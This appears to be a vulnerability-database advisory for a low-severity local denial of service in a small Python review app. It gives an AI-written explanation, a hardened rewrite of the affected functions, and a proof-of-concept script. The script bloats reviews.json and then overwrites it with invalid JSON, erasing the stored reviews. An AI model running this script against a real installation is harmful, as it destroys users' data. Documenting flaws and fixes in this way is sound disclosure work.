VYPR
Low severity · 3.3 · NVD Advisory · Published Jun 1, 2026

CVE-2026-10295

Description

SourceCodester Customer Review App 1.0 is vulnerable to denial of service via improper input validation in review_app.py, allowing local attackers to crash the application.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A vulnerability exists in SourceCodester Customer Review App 1.0, specifically within the add_review, save_review, and get_all_reviews functions in the review_app.py file. The application fails to validate user-supplied input in the name and comment fields before writing it to the local reviews.json file. This improper input validation can lead to a denial of service condition. The attack requires local access [1].

Exploitation

An attacker with local access can exploit this vulnerability by providing manipulated input to the name or comment arguments. The add_review function retrieves input from self.name_entry and self.comment_text without performing length or character validation. This unsanitized input is then passed to save_review, which directly writes it to the reviews.json file using json.dump. The get_all_reviews function uses a bare except clause that silently suppresses all errors, potentially leading to data loss or application instability [1].

Impact

Successful exploitation of this vulnerability results in a denial of service. The application may crash or become unstable due to the improper handling of malformed input written to the JSON storage file. The scope of the impact is limited to the local instance of the application, as the attack requires local access [1].

Mitigation

No patched version or fix release date has been disclosed in the available references. As of the publication of this vulnerability, the vendor has provided no workarounds or official mitigation strategies. The affected software version is 1.0 [1, 2].

AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The application fails to validate user-supplied input in the name and comment fields before writing to a local JSON file."

Attack vector

An attacker with local access can exploit this vulnerability by providing excessively large input for the 'name' and 'comment' fields. This oversized input is written directly to the `reviews.json` file without any length validation [1]. Subsequently, when the application attempts to load this bloated file, it can lead to a denial of service due to excessive memory consumption or processing time [1]. Additionally, corrupting the JSON structure in `reviews.json` can cause silent data loss [1].

Affected code

The vulnerability resides in the `review_app.py` file, specifically within the `add_review()`, `save_review()`, and `get_all_reviews()` functions. The `add_review()` function retrieves user input without length validation, and `save_review()` writes this unsanitized input directly to the `reviews.json` file. The `get_all_reviews()` function uses a bare `except` clause that silently suppresses errors [1].

What the fix does

The suggested fix involves implementing input length validation for both the name and comment fields to reject oversized input. Additionally, the bare `except` clause in `get_all_reviews()` should be replaced with specific exception handling for `json.JSONDecodeError` and `IOError` to prevent silent data loss and provide informative error messages [1].
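A hardened version of the three functions named above, written here as an added example rather than the project's own code. The length limits, the store-size cap, the error classes and the atomic-replace write are assumptions; the advisory names no specific values. The point it demonstrates is that a corrupt or bloated `reviews.json` is reported as an error and is never overwritten by a later save.

```python
import json
import os

# Limits are assumptions for this example; the advisory names no specific bound.
MAX_NAME_LEN = 50
MAX_COMMENT_LEN = 500
MAX_STORE_BYTES = 1_000_000  # a store this large cannot have come from validated input

class ReviewValidationError(ValueError):
    """Input rejected before it reaches reviews.json."""

class ReviewStoreError(RuntimeError):
    """reviews.json could not be read; raised instead of silently returning []."""

def validate_review(name, rating, comment):
    """Bound the type and length of each field so oversized input never reaches the store."""
    if not isinstance(name, str) or not name.strip():
        raise ReviewValidationError("name is required")
    if len(name) > MAX_NAME_LEN:
        raise ReviewValidationError(f"name longer than {MAX_NAME_LEN} characters")
    if not isinstance(comment, str) or len(comment) > MAX_COMMENT_LEN:
        raise ReviewValidationError(f"comment longer than {MAX_COMMENT_LEN} characters")
    if rating not in range(1, 6):
        raise ReviewValidationError("rating must be an integer from 1 to 5")
    return {"name": name.strip(), "rating": rating, "comment": comment.strip()}

def get_all_reviews(db_file):
    """Load the store, reporting a corrupt or unreadable file instead of swallowing the error."""
    if not os.path.exists(db_file):
        return []
    if os.path.getsize(db_file) > MAX_STORE_BYTES:
        raise ReviewStoreError(f"{db_file} exceeds {MAX_STORE_BYTES} bytes; refusing to parse")
    try:
        with open(db_file, "r", encoding="utf-8") as f:
            reviews = json.load(f)
    except json.JSONDecodeError as exc:
        raise ReviewStoreError(f"{db_file} is not valid JSON (line {exc.lineno})") from exc
    except OSError as exc:  # IOError is an alias of OSError in Python 3
        raise ReviewStoreError(f"cannot read {db_file}: {exc}") from exc
    return reviews

def save_review(db_file, review):
    """Prepend a validated review; a failed load propagates, so the old store is never overwritten."""
    reviews = get_all_reviews(db_file)
    reviews.insert(0, review)
    tmp = db_file + ".tmp"
    with open(tmp, "w", encoding="utf-8") as f:
        json.dump(reviews, f, indent=4)
    os.replace(tmp, db_file)  # atomic swap: a crash mid-write leaves the previous file intact
```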

Preconditions

  • Input: The attacker must be able to provide input to the 'name' and 'comment' fields.
  • Auth: The attacker must have local access to the application.

Reproduction

Run the following script while the app is installed:

```python
import json
import os

# Target file written by the app
db_file = "reviews.json"

# PoC 1: Denial of Service via oversized input
# Simulates submitting a 10MB comment field
malicious_review = {
    "name": "A" * 1000000,  # 1MB name
    "rating": 5,
    "comment": "B" * 9000000  # 9MB comment
}

reviews = []
if os.path.exists(db_file):
    with open(db_file, "r") as f:
        reviews = json.load(f)
reviews.insert(0, malicious_review)
with open(db_file, "w") as f:
    json.dump(reviews, f, indent=4)
print("[+] PoC 1 complete: reviews.json bloated to ~10MB")
print("[+] App will now lag or freeze on load due to unbounded data")

# PoC 2: Silent data loss via JSON corruption
# The bare except in get_all_reviews() will silently return []
with open(db_file, "w") as f:
    f.write("{ INVALID JSON !!! }")
print("[+] PoC 2 complete: reviews.json corrupted")
print("[+] App silently returns empty list — all reviews lost, no warning shown")
```

Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 6

News mentions: 0

No linked articles in our index yet.